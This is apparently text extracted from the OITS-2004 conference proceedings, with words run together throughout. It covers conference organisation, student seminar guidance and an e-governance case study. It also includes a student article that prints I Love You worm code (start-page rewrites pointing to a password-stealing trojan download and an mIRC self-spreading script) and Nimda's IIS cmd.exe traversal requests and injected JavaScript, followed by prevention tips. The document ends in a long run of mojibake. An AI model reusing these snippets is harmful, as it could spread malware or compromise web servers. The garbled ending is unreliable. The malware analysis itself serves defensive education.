Receiving papers reviewing theminforming the authors about the acceptancerejection of their papers and finally receivingthe camera ready papers are some of the criticalfunctions that needed to be done with great careCyberspace was extensively used to carry outthese activities thus making execution of tasksfaster accurate and inexpensive Though therewas no facility for online submission authorscould e-mail their papers to either of the ProgramChairs Each paper was to be reviewed by atleast two reviewers Private HTML pages werecreated to facilitate this review process TheseHTML pages carried the following informationabout the papers submitted - numbers titleswhether reviewers found or not for a given paperand if found whether two reviewers were foundReviewers were given the access to those pagesand were asked to select the papers which wereyet to be allotted for review and the ones theywould like to review They could then downloadthe concerned papers for review E-mails wereused to receive reviews from the reviewers andcommunicate the same to authors withselection rejection status of their papers Finalpapers were also received through e-mails fromthe authorsDelegation

Though the committee of chairs wasresponsible for all basic activities yet it was notpossible for this committee to handle allresponsibilities especially those related to local

OITS-2004

28

arrangements Thus a committee of coordinatorsfor various activities was formed to handlevarious sub functions For example acoordinator was especially designated to lookafter accommodation and local conveyance ofguest speakers and delegates The conferencewas providing accommodation to around 20 oddguest speakers and they were to reach the venueat different dates and times and from differentcountries Receiving them putting them up inhotels and enabling them to reach the conferencevenue were all complex tasks and needed fulltime attention of one person

Besides accommodation and localconveyance there were coordinators forregistration arrangement at the conferencevenue poster session and special programs etcThe details of this coordination team were putup on the website and delegates were informedthrough e-mails to get in touch with the relevantcoordinator for their queries and requirementsThe coordinators were the faculty members ofthe host college and each coordinator wasassisted by a team of student volunteers fromthe same college

This arrangement not only ensured smoothfunctioning of the conference it increasedinvolvement of a large number of facultymembers The coordinators also appreciated therecognition they received For student volunteersit was a great learning opportunityExtending the Scope of the Conference

By nature a conference is an academicfunction and only involves researchers andacademicians from different institutions But thisconference was designed also to accommodatestudents industry representatives and teachersfrom schools and colleges Three special eventswere organized for this target group asymposium for educators an industry sessionfor students researchers and teachers andtutorials specially designed for students Allthese sessions were very successful and attracted

a large number of participants from the city Thusthe conference could benefit the community inthe local contextThe Financing Model

The conference also had a unique financingmodel Its registration fee was kept sufficientlylow to attract large number of participants Thusthe registration fees alone were not sufficient tomeet all the expenses Though the conference isorganized by an association in reality a localengineering college takes the lead every year inhosting it while other colleges provide financialsupport So a large part of the financialrequirement was met by the contribution fromthe local engineering colleges In return thesecolleges were given free registration for certainnumber of participants in the conference andthe tutorials

Tutorials were designed in such a way(content duration course materials and otherfacilities wise) that participants would not mindpaying to attend them Independentsponsorships were sought from local collegesfor special events and this was acknowledgedduring the event Besides association membersstaying abroad were able to garner a large chunkof financial support from some corporates Govtorganization like CSIR also extended somesupport The conference was able to generate asmall surplus besides meeting all its needs Thissurplus is given to the parent association to carryout computer awareness activitiesConclusion

The whole experience of being part of theorganizing team that carried out planningdesigning and organizing of the conferenceshowed that by bringing in innovation todifferent dimensions of the conference a teamcan not only enhance both the quality andquantity of participation among variousstakeholders it can turn the whole experienceinto an enriching and fun filled experience

OITS-2004

29

Guiding Seminars and Projects for UndergraduateEngineering Students

MN DasProfessor amp HOD

Computer Science amp Engineering and IT

IntroductionConduct seminar presentation and projects

for undergraduate engineering students in theirfinal year is an important and statutory part ofany university curriculum Seminar measuresmostly the external abilities and projectmeasures the internal abilities of a studentThrough seminar besides the technicalknowledge the presentation communicationand interpersonal skills of a student also getreflected Through project the depth of technicalknowledge acquired amp degree of understandingon fundamentals of engineering subjects by thestudent get evaluated Also to some extent thepresentation skills of a student gets reflect whenhe or she submits the project report and presentsbefore the audience (examiners studentcolleagues etc) A student goes through varietiesof engineering subjects (both theory andsessional) during his or her engineering studtyThese papers are mainly divided into twocategories (i) Core papers amp (ii) Supportingpapers Seminars and projects are based on thethorough understanding of all these papers bythe students Besides these course curriculumknowledge the projects amp seminars are alsobased on the extra or additional knowledgeacquired by the students by going throughvarious journals magazines research papersCDs internet amp reference books etc and byattending several tutorials workshopsseminars conferences symposiums andtechnical competitions etc

In short seminar and project are one typeof indicators of a students mental capability and

orientation to face and accept the practical andtechnical challenges in the real scenarios infuture

Role of faculty members as guides aco-guides

A student needs active support from his orher guide or co-guide for preparing himself orherself to present seminar and carrying out aproject work successfully Normally this guideis one of the faculty members of the concerneddepartment But some cases when a studentcarries out a project work in an organizationother than his or her institute a member of thatorganization becomes the guide However inthat case one of the faculty members of thedepartment must become a co-guide The role orthe co-guide is very important in the sense thathe or she has to orient the project done by thestudents as per the University guidelines Aseminar can be presented individually or ingroup (normally no of group members shouldnot exceed 3) Each Seminar team (either onemember or multiple members) must be linkedwith a guide called seminar guide Similarly aproject can be done individually or in group(normally no of group members should notexceed 5) Each project team (either one memberor multiple members) must be linked with a guideor co-guide called project guide or project co-guide Selecting a guide by a student group orvice versa is normally done through mutualconsultation Head of the department can playthe role of a negotiator in this situation For abetter focus and attention no of project teamsunder the supervision of a project guide or co-

OITS-2004

30

guide should not exceed 2 and no of seminarteams under the supervision of a seminar guideshould not exceed 4 Each group (either projector seminar) must submit an abstract or synopsisof the work to be done or presentation to be madeto their respective guides sufficiently before thecommencement of project work or seminarpresentation Seminar guides must ensure thattopics of seminars are of advanced amp state-of-the-art type These topics should not be from theUniversity course curriculum but can be basedon the basics of these subjects A schedule forthe seminar presentations should be notified byHOD to all concerned in a tabular manner withthe following fields representing the columns

rapport with them by directly speaking andby using proper eye contact A keennessshould be shown to them that thispresentation is for their learning amp benefitonly

b) The Middle bit is usually longest and canhave several sections This is structured witha logical sequence Movement from one areaor topic to another is done using verbal orvisual links OHP or LCD acetates are usefulfor breaking the middle bit up into smallerchunks

c) The End of the presentation should be asummary a conclusion a logical end to whathas gone before

iii) PracticeA number of practices should be made

about the presentation in front of the mirror infront of the cat before friends amp on ones ownetc If possible the audio visual equipments likeOHP LCD etc can be tried out before the actualday of presentations During practice feed backcan be obtained from friends regarding thespeaking speed (ie whether too fast or too slow)the visual aids (whether clear or not) logicalmovement of sequence (whether correct or not)amp overall performance (whether excellent goodor poor etc)

Following hints amp tips may be followedduring practice or at the time of actualpresentation Breathe slowly it calms you down Speak audibly but dont shout Speak at normal pare not very fast not

very slow Speak clearly Be enthusiastic Avoid using jargons and colloquialisms

unless these are familiar to the audience Be aware of your gestures

Date Time Slot Group Title of Formatof topic presentation

(LCD OHP)

Guidelines for Seminar Presentation3 PS Preparation Planning amp practicei) PreparationPreparation for seminar presentation can

be effectively done if the following questions areasked to themselves by the students concerned What do I want the audience to LEARN or

DO as a result of my presentation How can I keep the audience interested Do I know my subject

Fundamental rule is that keep itstraightforwardly simple which is abbreviatedas KISS

ii) Planning-Any form of communication should have

a structure Beginning a Middle bit and anEnda) The Beginning should tell the audience

what the presenter(s) is going to tell them Itshould be positive Presenter should engagethe audiences attention and establish

OITS-2004

31

Use large fonts if LCD or OHP are beingused

Learn from watching others follow thestrength amp reject the weaknesses of otherspeakers

Use lots of figures diagrams charts ampgraphs etc

Point to the projection (screen) not thesource

Maintain the timing perfectly

Guidelines for Project Presentation(We have assumed that project guides

project teams amp topics of the projects havealready been finalized)1st Step- Write the abstracts or synopsis of theproject2nd Step- Set a realistic timeframe

Assuming 100 effectives working days ina semester the following is a sample break upDefine your problem - - - - - - - -Write a proposal - - - - - - - -- - -Develop your solution - - - - - - -Implement your solution - - - - -Present your solution - - - - - - -Submit the project report - - - - -3rd Step-

Make proper evaluation amp assessment ofperformance of the students on the basis of finalproducts (results reports and presentation) andthe process by which they were attained Thegrade is given for the entirety of the project Asample grade system may be as followsA a consistently excellent effort that attains

project goalsB a consistently good effort that attains project

goalsC an acceptable effort that at least partially

attains the project goals

D an inconsistent or unsatisfactory effort thatonly partially attains project goals

F an unsatisfactory effort that does not attainproject goals

Tips for writing project reports 1) Sketch the outline of the project2) Expand your outline3) Write your paper4) Rewrite until you get it right

A sample outline for project reports Introduction Background Design Implementation System in Action Results Future work Conclusion ReferenceBesides these the cover page design

acknowledgement topic index index for figuresamp tales etc can be added at proper locations ofthe project report

ConclusionSince projects amp seminars are indicators of

internal amp external abilities of the engineeringstudents the respective faculty guides or co-guides must motivate their students in such amanner that they do not resort to any kind offalse means for carrying out these two mostimportant activities of their student carrer

20 days

20 days

60 days

About the author Prof MN Das is currently Professoramp HOD in the Department of Computer Science ampEngineering at KIIT Deemed University After completinghis BE in Electronics amp Telecommunication branch in1987 from UCE Burla he was with ECIL Hyderabadfor few months in its computer group Then he joinedas a lecturer in the Dept of Electronic amp Tele commengineering dept of UCE Burla and continued upto1987 He completed his ME in Electronics systems ampcommunication during this period He then joined OrissaState Electronic Development Corporation (OSEDC) Ltdfor 1987 amp continued upto 2002 During that period hecompleted his PG Diploma in Management atXIMBAfter a long 16yrs inducted experience in various areashe joined KIIT Deemed University from 2002 onwards

OITS-2004

32

Information and CommunicationTechnology (ICT) has today become an integralpart of governance especially in India ICT isviewed as a tool that will help deliver servicesboth in the public and the private sector to theubiquitous common man What used to takeyears to compile and analyse now takes just afew seconds or minutes

E-governance as a concept involvesleveraging ICT to streamline the administrativeprocess it involves computerisation of recordsfacilitating efficient transactions betweenvarious government departments networkingoffices and using websites and e-mail to bringadministrators closer to people

In the past decade e-governance has beena popular buzzword among politicians andbureaucrats alike especially in India One quasi-Government organisation in Tamil Nadu hasdecided to go the distance by implementing e-governance at a micro level their office is nowcompletely paperless and file-transfer takesplace in an electronic format

Using a tool aptly titled e-Administration Chennai-based ElectronicsCorporation of Tamil Nadu Ltd (ELCOT) withthe help of an Information and CommunicationTechnologies (ICT) organisation called Life-Lineto Business (LL2BCOM) has introduced aworkflow and document management processsans physical movement or use of paper

Designated by the Government of TamilNadu to promote IT industries in the stateELCOT besides supporting IT entrepreneurs also

Case study on ICT and e-GovKrishnan V D G

ICT amp e-Gov Specialistkrisdevgmailcom

promotes joint ventures in electronicscommunication and IT They also help developinfrastructure for the software industry in theform of IT parks and by providing effectivecommunication backbones

LL2BCOMs e-Administration toolallows ELCOT officials to sanction purchasesapprove official activities and transfer filesflawlessly in completely electronic format Witha view to introduce transparency in theirworkflow process all the files processed in theorganisation are made available on a centralserver while the status of pending files can beobtained at any stage There is no physicalmovement of files at any stage only the finalorder copies are printed and stored as physicalrecord

The Nuts and BoltsAs part of its e-governance initiative the

Government of Tamil Nadu embarked on apaper-less office drive for introducingtransparency and accountability in its internaland external transactions

ELCOT the nodal organization for ITactivities in the state decided to introduce e-Administration a paperless FileManagement System which ensures speedydisposal of files The entire process creationmovement monitoring and approval of filestakes place electronically resulting in betterutilisation of manpower This helps avoidingdelays which leads to better governanceaccording to Sudeep Jain IAS MD ELCOT

OITS-2004

33

e-Administration is the brainchild of ICTand e-Gov specialist VDG Krishnan who hasover a quarter of a century hands-on managerialexperience in the Public Sector in India and aleading MNC in North South America He isthe Founder President of Life-Line to Business(LL2BCOM Pvt Ltd) His urge was to developa simple yet effective solution that can help totransform the Governments Corporates SMEsand NGOs The tool was conceived by him afterhis return to India as an apt solution for e-Governance in the developing world based onhis experience in both the developing and thedeveloped world

e-Administration is a web-enabledplatform-independent paperless solutiondeveloped on an Open Source platform forpaperless communication within and outsidean organization It uses open source offeringssuch as J2EE JBOSS PGSQL all running onLinux

The tool according to Krishnan canreduce the cycle time for file approval from anaverage of two to three weeks to one week Thiscan also result in a considerable reduction ofpaper-usage within an organisation therebysaving valuable natural resources

According to Krishnan LL2Bs toolempowers every employee in the organizationto discharge his or her duties efficiently It hasalso reduced the dependence on subordinatesand makes the organization system-orientedrather than people-centric This is likely to resultin increased productivity

Being a Linux platform local languagecontent can also be easily added This tool canbe used by any organization whose activitiesinvolve dealing with multiple agencies forsimultaneous review and action The tool also

aids knowledge management and integrationin NGOs for self-assessment decentralised fieldupdating and centralised review andmonitoring

The ProcessELCOT conducted trials with products

offered by four to five SMEs for independentevaluation with a view to adopt the best toolThe SMEs were asked to implement thenecessary customisations to suit therequirements of ELCOT Govt

Trials were conducted over three to twelvemonths with equal opportunity given to all thevendors In each department one system wasconfigured as the server and five nodes (on anaverage) connected as clients for live testing

Says K Appuswamy General Manager (e-Governance) Many organizations hadconducted trials but only LL2Bs model workedsuccessfully at ELCOT

LL2BCOMs product was one of the fiveLAN based solutions tried out the front-endwas based on Visual Basic while the backendwas Microsoft Access SQL running on aMicrosoft Windows 2000 server in the initialtrials This tool was initially installed inELCOTs Marketing Department for about 5officers Seeing the effective use of the tool moreofficers and staff came forward voluntarily touse the tool Steadily the number was increasedand the solution upgraded to a browser basedweb version for removing the dependence onclient systems

Currently e-Administration systemconnects about 150 users in three differentlocations spread over a distance of about 25 KMsincluding their Corporate Office at Nandanamtheir Communication Division at Perungudy

OITS-2004

34

and their Chairman Mr Vivek Harinarain IASwho is the Secretary IT Govt of Tamil Nadu atthe Secretariat through a dedicated powerfulfour-way Xeon dual Processor with RAIDfacility running a versatile Oracle 9i databaseas backend on Linux advanced server centrallylocated at ELCOT Corporate office

The tool simplifies the process of generatingfiles and enables moving note sheetselectronically for approval Instead of physicallycarrying note sheets for approval from table totable the employees began using the tool Receiptof the e-document was indicated by pop-up alertmessages on the officers monitors

All letters received from external agenciescould now be scanned and converted intoelectronic documents which would then beadded to the central repository This systemenables a user to check the status of a file at anystage More importantly delays are minimisedas the files can be traced instantly through thenetwork employees can now know whichofficer has kept the file pending

The biggest advantage of e-Administration is that it enables us to view atany stage the status of pending file The detailsare available on a central server and can beaccessed by anyone having the authority Thisway workflow is simplified

LL2Bs e-Administration tool not onlyeffects a dramatic reduction of stationary usageand time taken to process documents it alsoserves to introduce transparency in the workingof any organisation

The employees of ELCOT also took to thesystem rather well According to AppuswamyOur employees became more and morecomfortable with using the tool as the trialsprogressed Its quite user-friendly and doesnt

require a lot of technical expertise I myself beganusing the system without any formal trainingand have been using it successfully for eightmonths now

AccoladesAt the 7th National e-Gov conference held

in Chennai in November 2003 MD ELCOTreceived a merit citation award from Governmentof India for implementation of e-Administration as a tool for e-Governance

The Industrial Guidance Bureau of theGovernment of Pondicherry has implementedan integrated e-Platform a quickly customizedsolution of e-Administration to automate theactivities of the Department of Industries andCommerce (Refer Budget 2004-2005 Addressof HE the Lt Governor Pondicherry httpwwwp on nic inopend eptsf in anc elgspeech2004pdf)

Item 7 of the speech reads as followsRemoval of poverty may not be

practically possible without focusing specialattention on creation of gainful jobopportunities The Tenth plan at the nationallevel envisages creation of 50 million newemployment opportunities over a period of fiveyears Therefore focused attention will be givento few critical sectors such as

Industries Information Technology etcwhich have very high employment potential

Item 19 of the speech reads as followsThe manufacturing sector of the economy

has potential to absorb the surplus labour forceThe labour intensive manufacturing units canprovide gainful job opportunities for skilled aswell as semi-skilled labour force We willcontinue to encourage new entrepreneurs tochoose Pondicherry as their destination for

OITS-2004

35

establishing new industrial units andprocedures will be simplified to obtain licence permission to start units We will continue topursue the policies of promoting pollution freeless water and less power consuming industriesin our Union Territory

Item 20 of the speech reads as followsIndustrial Guidance Bureau with

integrated e-Platform has been established bysubstituting single window clearance system tospeed up the process of industrial clearance permission for setting up of new industrial unitsA total of 21 Departments includingMunicipalities Commune Panchayats havebeen integrated with a dedicated electronicnetwork for granting permission to set up anindustry and also to commence production

This saves a lot of time effort and cost toindustrialists and citizens as well as officials ofvarious Departments As against submitting 10copies of documents in the manual system inthe electronic system only one signed copy needsto be submitted thereby saving 90 of paperresulting in conserving of natural forestresources

A unique initiative being attempted for thefirst time in India 21 Departments includingmunicipalities and Panchayats are connectedon a simple dial-up The central repository serverwill be located at the District Industries CentrePondicherry This will form a dedicatedelectronic network The network will allow theGovernment to grant permission for example toset up an industry it can also help amanufacturing unit obtain a Licence tocommence production etc

Says Krishnan This would save a lot oftime effort and cost to industrialists and citizensas well as officials of various Departments As

opposed to submitting 10 copies of documentsin the manual system in the electronic systemonly one signed copy needs to be submittedthereby helping save paper It can help to fuelinvestment in the State and generateemployment for local people

Such an integrated e-Platform can be usedby the ministries and Undertakings of theCentral Government as well as various StateGovernments where ever multiple agencies areinvolved in scrutinizing applications andgranting time bound clearances for planapproval building constructions setting-upindustries etc It can bring about the muchdesired transparency and accountability

Various Central and State GovernmentDepartments and Undertakings including theAndhra Pradesh Technology Services theGovernments of West Bengal Orissa ManipurGoa etc State Bank of India the CanadianConsulate in Chennai British Trade Office(Bangalore) Ministry of Industrial DevelopmentMalaysia and the State of Sarawak Malaysiahave shown interest in e-Administration aweb enabled solution developed using opensource This can considerably cut down thebudget expenditure for e-Governance accordingto Krishnan

Instead of resting on their laurels LL2Bplans to reach out to the various GovernmentDepartments and Undertakings as well asCorporates SMEs and NGOs by implementingtheir solutions in as many public and privateorganisations as possible in India and thedeveloping world by offering the basic solutionfree and charging only for the customisationinstallation training hand holding annualmaintenance and upgrade support eitherdirectly or through ELCOT with whom LL2Bhas a marketing tie-up This is expected to benefit

OITS-2004

36

vastly Governments in India and the developingworld by saving on e-Governance expenditureWe are currently holding discussions with theChennai Metropolitan Development Authority(CMDA) and The Tamil Nadu Dr MGRMedical University to implement e-Administration in their offices institutionsacross the city says Krishnan

Shri D Jayakumar the Hon Minister forIT Govt of Tamil Nadu had stated in the StateAssembly

The Government has also decided to takeup development of four generic softwares paperless office electronic delivery of servicesdevelopment of government portal andintegrated district information system

Of these the paperless office was alreadyin place in ELCOT

While its naiumlve to believe that e-Administration paperless office solutions likeLL2Bs may just be the panacea for our red-taperidden bureaucracy it certainly is a step in theright direction one small step for e-governance a giant leap for democracy

Why ELCOT took the plunge

1 The number of major departments 42 The average number of files generated per

department per year 1503 The average number of physical

movements per file 204 The average number of cycles per file from

start to end 8The total number of manual entries file

movement from desk-to-desk per year4x150x20x8 = 96000 manual entries or filemovements per year

The workload is not evenly distributed asit depends on a hierarchy for granting sanctionandor approval of files The Managing Director(MD) typically has to view and approveapproximately 200 files per week That is anaverage of 40 files per working day This is apartfrom the various meetings he has to attend Filespile up when he is on tour and he is forced tocarry work home When the officer is away filesare kept pending The officer may not even knowthat there are files pending even if they are urgentThese problems cause inordinate delays in theworkflow process A tool such as e-Administration ensures prompt disposal of filesand access to a central database where the statusof files can be monitored at every stage thusensuring efficiency and transparency

Sudeep Jain MD ELCOT confirms thatwhile average cycle time for file approval wasearlier 15 to 21 days after the implementationof the electronic system it was brought down to5 to 7 days

Source E-ADMINISTRATION THE KEY FOR E-GOVERNANCE - INITIATIVES FORCREATING A PAPERLESS OFFICE bySudeep Jain IAS Managing Director ELCOTChennai-35 presented at the 7th National e-Gov Conference in Nov 2003 conducted by theDepartment of Administrative Reforms andPublic Grievances Ministry of PersonnelPublic Grievances and Pension Govt of India

Further enquiries on e-Administration or onimplementing e-Governance Corporate Governancemay be addressed to Mr Krishnan at krisdevgamilcom

OITS-2004

37

Intruders who access networks and systems without authorization or inside attackers withmalicious motives can plant various types of programs to cause damage to the network Theseprograms often lumped together under the general term viruses although other varieties have costcompanies and individuals billions of dollars in lost data lost productivity and the time andexpense of recovery Some of the more destructive examples of malicious code also sometimesreferred to as malware [MALicious softWARE - mark the uppercase MALWARE] over the pastdecade are CIHChernobyl Melissa Code Red Nimda Klez

Now Im going to explain about the two most popular malwares - some exploits which thesemalwares used but NOT how the whole code worked or how to code a malware to exploit

I Love You Worm

The I Love You virus is a little more bulky so I chose not to include the entire script here Youcan download all of the I Love You source from httpwwwpacketstormsecurityorgviral-dblove-letter-sourcetxt

What is interesting to note about the I Love You virus is that it randomly changed the usersdefault Web browser homepage to one of four locations as seen here by the code

num = Int((4 Rnd) + 1)if num = 1 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~young1sHJKhjnwerhjkxcvytwertnMTF wetrdsfmhPnjw6587345gvsdf7679njbvYTWIN-BUGSFIXexe

elseif num = 2 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~angelcatskladjflfdjghKJnwetryDGF ikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4wWIN-BUGSFIXexe

elseif num = 3 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~koichijf6TRjkcbGRpGqaq198vbFV5hfFE kbopBdQZnmPOhfgER67b3VbvgWIN-BUGSFIXexe

elseif num = 4 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~chusdgfhjksdfjklNBmnfgkKLHjkqwtuHJB hAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234 iuy7thjgWIN-BUGSFIXexe

end ifend if

Known Malware ExploitationAbhishek Bhuyan

KIIT Student

OITS-2004

38

The WIN-BUGSFIXexe turned out to be a Trojan application designed to steal passwordsNow a quick look notices all of the URLs present are on wwwskyinetnet This resulted in manyplaces simply blocking access to that single host While bad for skyinetnet it was an easy fix foradministrators Imagine if the virus creator has used more popular hosting sites such as the membershomepages of aolcom or even made reference to large sites such as yahoocom and hotmailcom would administrators rush to block those sites as well Perhaps not Also had someone at skyinetnetbeen smart they would have replaced the Trojan WIN-BUGSFIXexe with an application that woulddisinfect the system of the I Love You virus That is if administrators allowed infected machinesto download the Trojaned Trojan

I Love You also modifies the configuration files for mIRC a popular Windows IRC chat clientif (s=mirc32exe) or (s=mlink32exe) or (s=mircini) or(s=scriptini) or (s=mirchlp) thenset scriptini=fsoCreateTextFile(folderspecampscriptini)

scriptiniWriteLine [script]scriptiniWriteLine mIRC ScriptscriptiniWriteLine Please dont edit this script mIRC will corrupt if mIRC willscriptiniWriteLine corrupt WINDOWS will affect and will not run correctly thanksscriptiniWriteLine scriptiniWriteLine Khaled Mardam-BeyscriptiniWriteLine httpwwwmirccomscriptiniWriteLine scriptiniWriteLine n0=on 1JOINscriptiniWriteLine n1= if ( $nick == $me ) halt scriptiniWriteLine n2= dcc send $nick ampdirsystemampLOVE-LETTER-FOR-YOUHTMscriptiniWriteLine n3=scriptinicloseHere we see I Love You making a change that would cause the users IRC client to send a copy

of the I Love You virus to every person who joins a channel that the user is in Of course the filenamehas to be enticing to the users joining the channel so they are tempted into opening the file- Nimda Worm -

In September 2001 a very nasty worm reared its ugly head The Nimda (Just reverse nimdaand you get admin) worm also called the Concept viruswas another worm which propagated viaMicrosoft hostsNimda featured multiple methods to infect a host

It could send itself via e-mail It would attach itself as an encoded exe file but would use anaudiox-wave Multipurpose Internet Mail Extensions (MIME) type which triggered a bug in InternetExplorer to automatically execute the attachment upon previewing the e-mail Once the attachmentwas executed the worm would send itself to people in the users address book as well as e-mailaddresses found on Web pages in Internet Explorers Web page cachethat means the worm wouldactually find e-mail addresses on recently browsed Web pages The worm would scan for vulnerableIIS machines looking for the rootexe files left over from the Code Red II and Sadmind worms aswell as using various Unicode and double-encoding URL tricks in order to execute commands onthe serverThe following is a list of requests made by the worm

GET scriptsrootexec+dir

OITS-2004

39

GET cwinntsystem32cmdexec+dirGET dwinntsystem32cmdexec+dirGET MSADCrootexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scriptsxc1x1cwinntsystem32cmdexec+dirGET scriptsxc0winntsystem32cmdexec+dirGET scriptsxc0xafwinntsystem32cmdexec+dirGET scriptsxc1x9cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scripts2fwinntsystem32cmdexec+dirGET _vti_bin5c5c5cwinntsystem32cmdexec+dirGET _mem_bin5c5c5cwinntsystem32cmdexec+dirGET msadc5c5c5cxc1x1cxc1x1cxc1x1cwinntsystem32

cmdexec+dirOnce the worm found a vulnerable IIS server it would attempt to Trivial File Transfer Protocol

(TFTP) the worm code to the target server It would also modify the IIS server by creating a guestaccount and adding it to the Administrators group It would also create a Windows share of theC drive (using the name C$)

All local hypertext markup language (HTML) and Application Service Provider (ASP) fileswould be modified to include the following code snippet

ltscript language=JavaScriptgtwindowopen(readmeeml null resizable=notop=6000left=6000)ltscriptgtIn addition the worm would copy itself to the readmeeml file The final result was that

unsuspecting Web surfers would automatically download and possibly execute the worm froman infected Web site

The worm copies itself into EML and NWS in various local and network directories If anunsuspecting user uses Windows Explorer to browse a directory containing these files it is possiblethat the automatic preview function of Explorer would automatically execute the worm This wouldallow the worm to propagate over file shares on a local network

The worm also copies itself to richeddll which is an attempt to Trojan Microsoft Officedocuments since documents opened in the same directory as the richeddll binary will load andexecute the Trojan DLL

The end result was a noisy but very effective worm It was noisy because it created many EMLand NWS files on the local system It also modified Web pages on the Web site which made it easyto remotely detect a compromised server But the multi-infection methods proved quite effective andmany people who had run through and removed the worm had found that their systems keptgetting infectedit is a tough worm to fully eradicate To properly combat it the securityadministrator needed to patch their IIS server upgrade their Microsoft Outlook client and be cautiousof browsing network shares Full information on the Nimda worm is available in the Security Focusanalysis

httparissecurityfocuscomalertsnimda010921-Analysis-Nimda-v2pdf

OITS-2004

40

Some tips on prevention and responseProtecting systems and networks from the damage caused by Trojan horses viruses and

worms is mostly a matter of common sense Practices that can help prevent infection include thefollowing Do not run executable (EXE) files from unknown sources including those attached to an e-

mail or downloaded from web sites Turn off the Preview andor HTML mail options in the e-mail client program Do not open Microsoft Office documents from unknown sources without first disabling

macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc 